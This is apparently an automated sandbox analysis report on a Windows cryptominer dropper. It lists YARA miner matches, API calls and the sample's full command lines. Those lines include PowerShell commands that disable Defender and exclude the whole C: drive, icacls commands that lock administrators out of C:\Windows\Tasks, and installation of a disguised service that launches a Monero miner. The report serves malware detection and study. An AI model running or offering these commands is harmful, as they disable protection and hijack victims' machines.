                                  Source: C:\ProgramData\migrate.exeCode function: String function: 0012F5F0 appears 31 times
                                  Source: C:\Windows\Tasks\1.exeCode function: String function: 003FEB78 appears 39 times
                                  Source: C:\Windows\Tasks\1.exeCode function: String function: 003FEC50 appears 56 times
                                  Source: C:\Windows\Tasks\1.exeCode function: String function: 003FF5F0 appears 31 times
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: String function: 0088EB78 appears 39 times
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: String function: 0088EC50 appears 56 times
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: String function: 0088F5F0 appears 31 times
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: String function: 000000014000C070 appears 34 times
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: String function: 00000001400026B0 appears 34 times
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: String function: 0000000140009B50 appears 48 times
                                  Source: mFfXERcN.log.65.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: UtDRkwHy.log.65.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: DmmmRJbk.log.65.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: syIwhxhC.log.65.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: brrRNKBn.log.65.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: IntelConfigService.exe.26.drStatic PE information: Resource name: RT_GROUP_ICON type: GLS_BINARY_LSB_FIRST
                                  Source: IntelConfigService.exe.26.drStatic PE information: Resource name: RT_GROUP_ICON type: GLS_BINARY_LSB_FIRST
                                  Source: IntelConfigService.exe.26.drStatic PE information: Resource name: RT_GROUP_ICON type: GLS_BINARY_LSB_FIRST
                                  Source: python3.dll.56.drStatic PE information: No import functions for PE file found
                                  Source: IYXE4Uz61k.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: 53.0.ApplicationsFrameHost.exe.7ff6a9510000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                  Source: 53.0.ApplicationsFrameHost.exe.7ff6a9510000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                  Source: mFfXERcN.log.65.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: UtDRkwHy.log.65.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: DmmmRJbk.log.65.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: syIwhxhC.log.65.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: brrRNKBn.log.65.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: IYXE4Uz61k.exeBinary or memory string: C.vBp=)
                                  Source: classification engineClassification label: mal100.spre.troj.adwa.expl.evad.mine.winEXE@116/100@0/2
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_00876C74 GetLastError,FormatMessageW,0_2_00876C74
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_000000014000A810 GetCurrentThread,OpenThreadToken,GetLastError,ImpersonateSelf,GetCurrentThread,OpenThreadToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,CloseHandle,31_2_000000014000A810
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_000000014000A810 GetCurrentThread,OpenThreadToken,GetLastError,ImpersonateSelf,GetCurrentThread,OpenThreadToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,CloseHandle,37_2_000000014000A810
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: _snwprintf_s,CreateServiceW,GetLastError,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,31_2_00000001400133A0
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: _snwprintf_s,CreateServiceW,GetLastError,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,37_2_00000001400133A0
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_000000014000ACB0 CreateToolhelp32Snapshot,GetLastError,GetLastError,CloseHandle,PostThreadMessageW,Thread32Next,PostThreadMessageW,Thread32Next,GetLastError,GetLastError,CloseHandle,31_2_000000014000ACB0
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0088A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0088A6C2
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_0000000140012160 _snwprintf_s,GetProcessHeap,HeapAlloc,ChangeServiceConfigW,GetProcessHeap,HeapFree,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetLastError,31_2_0000000140012160
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_000000014000A2E0 _snwprintf_s,PathQuoteSpacesW,GetModuleFileNameW,GetModuleFileNameW,PathQuoteSpacesW,TlsAlloc,GetStdHandle,StartServiceCtrlDispatcherW,GetLastError,31_2_000000014000A2E0
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_000000014000A2E0 _snwprintf_s,PathQuoteSpacesW,GetModuleFileNameW,GetModuleFileNameW,PathQuoteSpacesW,TlsAlloc,GetStdHandle,StartServiceCtrlDispatcherW,GetLastError,37_2_000000014000A2E0
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF41c22a.TMPJump to behavior
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5848:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2144:120:WilError_03
                                  Source: C:\Windows\Bridgeprovider.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7996:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
                                  Source: C:\Windows\Bridgeprovider.exeMutant created: \Sessions\1\BaseNamedObjects\Local\c157af4645d8476b01dd23db4d6f694fd791607889a62dd241070f1213919be9
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8020:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6096:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7896:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8036:120:WilError_03
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvxw3c0k.if4.ps1Jump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCommand line argument: sfxname0_2_0088DF1E
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCommand line argument: sfxstime0_2_0088DF1E
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCommand line argument: STARTDLG0_2_0088DF1E
                                  Source: C:\ProgramData\migrate.exeCommand line argument: c:\programdata26_2_0012DF1E
                                  Source: C:\ProgramData\migrate.exeCommand line argument: sfxname26_2_0012DF1E
                                  Source: C:\ProgramData\migrate.exeCommand line argument: sfxstime26_2_0012DF1E
                                  Source: C:\ProgramData\migrate.exeCommand line argument: STARTDLG26_2_0012DF1E
                                  Source: C:\Windows\Tasks\1.exeCommand line argument: sfxname60_2_003FDF1E
                                  Source: C:\Windows\Tasks\1.exeCommand line argument: sfxstime60_2_003FDF1E
                                  Source: C:\Windows\Tasks\1.exeCommand line argument: STARTDLG60_2_003FDF1E
                                  Source: C:\Windows\Tasks\1.exeCommand line argument: xzC60_2_003FDF1E
                                  Source: IYXE4Uz61k.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SUPERFETCH.EXE'
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeFile read: C:\Windows\win.iniJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: IYXE4Uz61k.exeReversingLabs: Detection: 34%
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeFile read: C:\Users\user\Desktop\IYXE4Uz61k.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\IYXE4Uz61k.exe "C:\Users\user\Desktop\IYXE4Uz61k.exe"
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /N "Superfetch.exe"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\takeown.exe takeown /f c:\windows\tasks
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAK
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -ExclusionPath c:\
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAK
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\migrate.exe c:\programdata\migrate.exe -p4432
                                  Source: C:\ProgramData\migrate.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAK
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 1 /NOBREAK
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\Wmiic.exe "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
                                  Source: C:\Windows\Tasks\Wmiic.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 1 /NOBREAK
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\Wmiic.exe "C:\windows\tasks\wmiic" start WMService
                                  Source: C:\Windows\Tasks\Wmiic.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 2 /NOBREAK
                                  Source: unknownProcess created: C:\Windows\Tasks\Wmiic.exe C:\windows\tasks\Wmiic.exe
                                  Source: C:\Windows\Tasks\Wmiic.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\Tasks\Wmiic.exeProcess created: C:\Windows\Tasks\IntelConfigService.exe "IntelConfigService.exe"
                                  Source: C:\Windows\Tasks\IntelConfigService.exeProcess created: C:\Windows\Tasks\Wrap.exe C:\Windows\Tasks\Wrap.exe
                                  Source: C:\Windows\Tasks\IntelConfigService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "%username%:(R,REA,RA,RD)"
                                  Source: C:\Windows\Tasks\Wrap.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\Tasks\IntelConfigService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\Tasks\IntelConfigService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\Tasks\Wrap.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\Tasks /deny "user-PC$:(R,REA,RA,RD)"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Tasks\ApplicationsFrameHost.exe C:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
                                  Source: C:\Windows\Tasks\IntelConfigService.exeProcess created: C:\Windows\Tasks\Superfetch.exe C:\Windows\Tasks\Superfetch.exe
                                  Source: C:\Windows\Tasks\IntelConfigService.exeProcess created: C:\Windows\Tasks\MSTask.exe C:\Windows\Tasks\MSTask.exe
                                  Source: C:\Windows\Tasks\MSTask.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net start WMService
                                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 start WMService
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\1.exe "C:\windows\tasks\1.exe"
                                  Source: C:\Windows\Tasks\1.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe"
                                  Source: C:\Windows\Tasks\MSTask.exeProcess created: C:\Windows\Tasks\MSTask.exe C:\Windows\Tasks\MSTask.exe
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\fwJLoWFGhpY.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Bridgeprovider.exe "C:\Windows/Bridgeprovider.exe"
                                  Source: C:\Windows\Bridgeprovider.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline"
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $TrueJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\Jump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe" Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /N "Superfetch.exe"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\takeown.exe takeown /f c:\windows\tasksJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAKJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $TrueJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -ExclusionPath c:\Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAKJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\migrate.exe c:\programdata\migrate.exe -p4432Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAKJump to behavior
                                  Source: C:\ProgramData\migrate.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 1 /NOBREAK
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\Wmiic.exe "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 1 /NOBREAK
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\Wmiic.exe "C:\windows\tasks\wmiic" start WMService
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 2 /NOBREAK
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net start WMService
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\1.exe "C:\windows\tasks\1.exe"
                                  Source: C:\Windows\Tasks\Wmiic.exeProcess created: C:\Windows\Tasks\IntelConfigService.exe "IntelConfigService.exe"
                                  Source: C:\Windows\Tasks\IntelConfigService.exeProcess created: C:\Windows\Tasks\Wrap.exe C:\Windows\Tasks\Wrap.exe
                                  Source: C:\Windows\Tasks\IntelConfigService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "%username%:(R,REA,RA,RD)"
                                  Source: C:\Windows\Tasks\IntelConfigService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
                                  Source: C:\Windows\Tasks\IntelConfigService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
                                  Source: C:\Windows\Tasks\IntelConfigService.exeProcess created: C:\Windows\Tasks\Superfetch.exe C:\Windows\Tasks\Superfetch.exe
                                  Source: C:\Windows\Tasks\IntelConfigService.exeProcess created: C:\Windows\Tasks\MSTask.exe C:\Windows\Tasks\MSTask.exe
                                  Source: C:\Windows\Tasks\Wrap.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\Tasks /deny "user-PC$:(R,REA,RA,RD)"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Tasks\ApplicationsFrameHost.exe C:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized
                                  Source: C:\Windows\Tasks\MSTask.exeProcess created: C:\Windows\Tasks\MSTask.exe C:\Windows\Tasks\MSTask.exe
                                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 start WMService
